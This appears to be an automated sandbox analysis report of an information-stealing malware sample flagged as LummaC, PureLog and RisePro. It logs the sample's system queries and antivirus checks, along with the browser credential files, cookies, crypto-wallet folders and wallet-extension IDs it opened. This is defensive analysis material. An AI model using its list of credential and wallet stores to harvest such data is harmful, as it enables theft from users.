Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: EnumSystemLocalesW,	22_2_003B0F07
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	22_2_003B0F92
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: GetLocaleInfoW,	23_2_001311E5
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	23_2_0013130E
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: GetLocaleInfoW,	23_2_0012A3A6
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: GetLocaleInfoW,	23_2_00131414
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	23_2_001314E3
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: EnumSystemLocalesW,	23_2_00130E21
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: EnumSystemLocalesW,	23_2_00130E6C
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: EnumSystemLocalesW,	23_2_00129EFC
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: EnumSystemLocalesW,	23_2_00130F07
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	23_2_00130F92

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Queries volume information: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe VolumeInformation
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Queries volume information: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe VolumeInformation
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Queries volume information: C:\ProgramData\MPGPH1\MPGPH1.exe VolumeInformation
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Queries volume information: C:\ProgramData\MPGPH1\MPGPH1.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Queries volume information: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe

Code function: 22_2_0039B80F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

22_2_0039B80F

Source: C:\Users\user\Desktop\OJa1BOigU3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.29.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: RegAsm.exe, 00000011.00000002.2647878541.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.2786250344.0000000003149000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 15.0.U8cABsPhZFkKRrQ4rE0N.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.637f940.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6333a00.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6339420.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.637f940.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6333a00.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.637f940.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.637f940.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6333a00.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.6333a00.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OJa1BOigU3.exe.634bfa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2277600314.000000000637F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2275260383.0000000006333000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2275159782.0000000006301000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2287643902.0000000000BB2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2275215754.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe, type: DROPPED

Yara detected RisePro Stealer

Source: Yara match	File source: 00000000.00000003.2165765311.0000000005E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3Q7v9y6Zw0a51Z43zHih.exe PID: 3336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSIUpdaterV1.exe PID: 5224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSIUpdaterV1.exe PID: 5344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AdobeUpdaterV1.exe PID: 5568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6244, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RLhyDRs2UHaLI0bTHvNtryI.zip, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000011.00000002.2647878541.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: OJa1BOigU3.exe, 00000000.00000003.2161513422.0000000005DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Jaxx\Local Storages
Source: RegAsm.exe, 00000011.00000002.2647878541.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: OJa1BOigU3.exe, 00000000.00000003.2162887949.0000000005DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: OJa1BOigU3.exe, 00000000.00000003.2162887949.0000000005DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: RegAsm.exe, 00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinanceKQ
Source: RegAsm.exe, 00000011.00000002.2647878541.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: RegAsm.exe, 00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: RegAsm.exe, 00000011.00000002.2647878541.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet\
Source: OJa1BOigU3.exe, 00000000.00000003.2277600314.000000000637F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: RegAsm.exe, 00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT	Jump to behavior
